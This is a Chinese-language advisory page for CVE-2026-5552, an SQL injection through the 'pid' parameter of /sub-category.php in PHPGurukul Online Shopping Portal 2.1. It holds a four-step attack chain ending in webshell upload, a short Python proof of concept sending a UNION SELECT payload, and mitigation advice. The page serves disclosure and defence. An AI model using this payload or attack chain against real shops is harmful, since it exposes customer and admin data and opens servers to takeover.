CVE-2026-5552 CVSS 6.3 中危

CVE-2026-5552 PHPGurukul商城SQL注入漏洞

披露日期: 2026-04-05

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-5552

漏洞类型

SQL注入

CVSS评分

6.3 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

PHPGurukul Online Shopping Portal Project

漏洞概述

PHPGurukul Online Shopping Portal Project 2.1版本中的/sub-category.php文件存在SQL注入漏洞。该漏洞源于组件Parameter Handler中对参数'pid'的处理不当。攻击者无需用户交互，仅需低权限即可远程利用此漏洞，通过操纵'pid'参数执行恶意SQL语句。攻击可能导致数据库信息泄露、数据篡改或服务中断，对系统的机密性、完整性和可用性造成低程度影响。目前该漏洞的利用代码已公开，风险显著。

技术细节

该漏洞位于PHPGurukul Online Shopping Portal Project 2.1的/sub-category.php文件中。在处理用户输入时，程序直接将HTTP请求中的'pid'参数拼接到SQL查询语句中，未进行有效的过滤或使用预编译语句。由于缺乏对输入数据的严格校验，攻击者可以构造包含SQL元字符（如单引号、UNION SELECT等）的恶意载荷。当后端数据库引擎执行该查询时，注入的SQL语句将被解析执行，从而绕过认证或窃取数据库中的敏感数据。攻击向量为网络，攻击复杂度低，所需权限低，且无需用户交互，这使得远程攻击者能够轻易地利用此漏洞。

攻击链分析

STEP 1

侦察

攻击者识别出运行PHPGurukul Online Shopping Portal Project 2.1的目标服务器，并定位到/sub-category.php接口。

STEP 2

探测

攻击者向/sub-category.php发送包含特殊字符（如单引号）的'pid'参数，观察服务器响应是否异常以确认SQL注入点。

STEP 3

利用

确认漏洞存在后，攻击者构造UNION SELECT等SQL语句注入到'pid'参数中，试图提取数据库结构、管理员密码等敏感信息。

STEP 4

维持与影响

利用获取的数据进一步登录后台，可能上传Webshell或篡改数据，实现对服务器的长期控制或破坏。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# PoC for CVE-2026-5552
# SQL Injection in /sub-category.php via 'pid' parameter

import requests

target_url = "http://example.com/sub-category.php"
payload = "1' UNION SELECT 1, version(), 3, 4, 5-- -"

params = {
    "pid": payload
}

try:
    response = requests.get(target_url, params=params, timeout=10)
    if response.status_code == 200:
        print("[+] Request sent successfully.")
        print("[+] Check the response for potential SQL output (e.g., database version).")
        print(response.text[:500]) # Print part of response
    else:
        print(f"[-] Request failed with status code: {response.status_code}")
except Exception as e:
    print(f"[-] An error occurred: {e}")

影响范围

PHPGurukul Online Shopping Portal Project 2.1

防御指南

临时缓解措施

建议在服务器端部署Web应用防火墙（WAF）以拦截常见的SQL注入攻击模式。在未修复前，可暂时禁用/sub-category.php的功能，或通过中间件（如Nginx）对'pid'参数进行严格的白名单校验，仅允许数字字符通过。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-5552
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-5552
3 Details https://www.cvedetails.com/cve/CVE-2026-5552/
4 VulDB https://vuldb.com/cve/CVE-2026-5552
5 Link https://github.com/f1rstb100d/CVE/issues/10
6 Link https://phpgurukul.com/
7 Link https://vuldb.com/submit/782864
8 Link https://vuldb.com/vuln/355316
9 Link https://vuldb.com/vuln/355316/cti

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表